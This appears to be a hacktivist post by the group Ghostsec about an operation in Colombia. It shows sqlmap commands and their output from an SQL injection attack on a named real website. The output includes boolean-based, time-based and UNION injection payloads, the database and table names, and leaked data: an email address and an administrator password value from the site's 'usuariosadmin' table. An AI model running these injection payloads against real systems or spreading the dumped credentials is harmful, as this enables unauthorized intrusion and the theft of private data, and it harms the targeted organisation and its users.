Ghostsec quiere decirle a Colombia, que encontramos una clave del jefe y un email del fbi.. op Colombia tiene el apoyo de nosotros (Ghostsec) para siempre… Ghost sec no está del lado de la corrupción en ningún momento, y seguiremos esponiendo cuanto profunda la corrupción es en Colombia…
Ghostsec wants to tell Colombia that we found a password from the admin and an email from the fbi .. op Colombia has the support of us (Ghostsec) forever … Ghost sec is not on the side of corruption at any time, and we will continue to search how deep the corruption is in Colombia …
sqlmap -u sqlmap -u https://www.ieee.org.co/evento.php?id=66 -D u476527422_ieeecoldb -T emails –columns
┌──(kali㉿kali)-[~]
└─$ sqlmap -u sqlmap -u https://www.ieee.org.co/evento.php?id=66 -D u476527422_ieeecoldb -T emails -C emailafiliacion –dump
___
__H__
___ ___[(]_____ ___ ___ {1.5.2#stable}
|_ -| . [,] | .’| . |
|___|_ [,]_|_|_|__,| _|
|_|V… |_| http://sqlmap.org
[16:21:06] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own (‘PHPSESSID=2tt3edl60f3…4sksrhic20′). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
—
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=66 AND 6772=6772
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=66 AND (SELECT 3557 FROM (SELECT(SLEEP(5)))RMpq)
Type: UNION query
Title: Generic UNION query (NULL) – 18 columns
Payload: id=-7658 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717a71,0x716b50536f746b7a7473786d4575744b7847474947785a647247424c44484a4c68524f7663417963,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL– –
—
[16:21:15] [INFO] the back-end DBMS is MySQL
web application technology: PHP, LiteSpeed, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[16:21:15] [INFO] fetching entries of column(s) ’emailafiliacion’ for table ’emails’ in database ‘u476527422_ieeecoldb’
got a 302 redirect to ‘http://www.ieee-tdla.org’. Do you want to follow? [Y/n] y
[16:21:20] [WARNING] reflective value(s) found and filtering out
Database: u476527422_ieeecoldb
Table: emails
[1 entry]
+————————————–+
| emailafiliacion |
+————————————–+
| cybersecurity.fbi.gov@protonmail.com |
+————————————–+
[16:21:22] [INFO] fetched data logged to text files under ‘/home/kali/.local/share/sqlmap/output/www.ieee.org.co’ [*] ending @ 16:21:22 /2021-07-21/
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=66 AND 6772=6772
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=66 AND (SELECT 3557 FROM (SELECT(SLEEP(5)))RMpq)
Type: UNION query
Title: Generic UNION query (NULL) – 18 columns
Payload: id=-7658 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717a71,0x716b50536f746b7a7473786d4575744b7847474947785a647247424c44484a4c68524f7663417963,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL– –
—
[15:03:57] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, LiteSpeed, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:03:57] [INFO] fetching entries of column(s) ‘clave’ for table ‘usuariosadmin’ in database ‘u476527422_ieeecoldb’
got a 302 redirect to ‘http://www.ieee-tdla.org’. Do you want to follow? [Y/n] y
[15:04:00] [WARNING] reflective value(s) found and filtering out
Database: u476527422_ieeecoldb
Table: usuariosadmin
[1 entry]
+—————+
| clave |
+—————+
| ncquzy3B/E.6A |
+—————+
[15:04:03] [INFO] fetched data logged to text files under ‘/home/kali/.local/share/sqlmap/output/www.ieee.org.co’
You must be logged in to post a comment.